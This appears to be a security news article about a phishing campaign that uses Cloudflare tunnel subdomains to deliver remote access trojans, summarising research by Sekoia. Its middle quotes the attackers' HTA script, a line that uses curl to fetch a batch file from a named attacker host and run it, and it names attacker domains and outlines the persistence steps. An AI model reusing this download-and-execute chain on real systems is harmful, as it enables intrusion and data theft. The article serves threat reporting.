A group of experts in cybersecurity have detected a complex attack campaign exploiting the tunnel infrastructure of Cloudflare to propagate different remote access trojans (RATs).
Since February 2024, this infrastructure has displayed remarkable resistance and is now being utilized as a platform for disseminating harmful files and trojans that allow malicious individuals to gain unauthorized entry into systems of unsuspecting victims.
Noteworthy security companies like Forcepoint, Fortinet, Orange, and Proofpoint have extensively documented this ongoing menace, accentuating its changing characteristics and increasing influence on organizations around the globe.
.png%0D%0A)
The initial method of infection begins with deceiving phishing emails that contain malicious attachments disguised as invoices or orders.
These emails frequently establish a false sense of urgency and may even include manipulated conversation threads with falsified replies to give the appearance of legitimacy.
The attachment typically employs the file format “application/windows-library+xml,” which often bypasses email security gateways due to its innocuous nature compared to binary files.
Upon being opened, this file establishes a link to a remote WebDav source hosted on Cloudflare’s tunnel infrastructure.
The Sekoia TDR (Threat Detection & Research) team analysts have been tracking this attack infrastructure, internally identified as the “Cloudflare tunnel infrastructure to deliver multiple RATs.”
Their examination uncovers a sophisticated multi-stage infection chain that employs various techniques of obfuscation to circumvent detection systems.
The intricacy of this assault highlights how malicious actors consistently develop innovative strategies to elude contemporary security measures, even as we approach 2025.
The perpetrators exploit domains with the suffix “trycloudflare.com,” including “malawi-light-pill-bolt.trycloudflare.com,” “players-time-corresponding-th.trycloudflare.com,” and others to host their malevolent content.
This infrastructure releases payloads that eventually establish continuous remote access to compromised systems, potentially leading to data theft and further infiltration of networks.
Working Mechanism of the Infection Chain
The process of infection commences when a user interacts with a LNK file camouflaged as a PDF document.
Instead of opening a bona fide document, this shortcut triggers the execution of an HTA file from the corresponding remote server. The HTA contents uncover the progression of the attack as follows:-
Set oShell = CreateObject("WScript.Shell")
oShell.Run "cmd. exe /c curl -o %temp%ben.bat https://players-time-corresponding-th.trycloudflare.com/ben.bat && %temp%ben.bat", 0, false
self. CloseThis script activates a BAT file responsible for installing Python and executing obfuscated Python code, which then injects the subsequent payload stage into processes of “notepad.exe.”
.webp)
For persistence, the malware establishes startup entries utilizing two VBS files and another BAT file located in the Windows Startup folder.
The final phase utilizes PowerShell to reflectively load a payload downloaded from a JPEG image containing an embedded base64 payload.
This facilitates the connection of the RAT to its command and control server, often leveraging dynamic DNS services like “duckdns.org” for communication.
.webp)
Chains of infection (Source – Sekoia)
Chains of infection dispersing AsyncRAT via an elaborate multi-phase process involving Windows-library files, LNK files, HTA execution, and Python injection.*
The progression of this campaign emphasizes how malicious actors perpetually adjust their tactics to evade security measures, underscoring the necessity of employing diverse detection strategies and continuous surveillance for similar patterns of attack.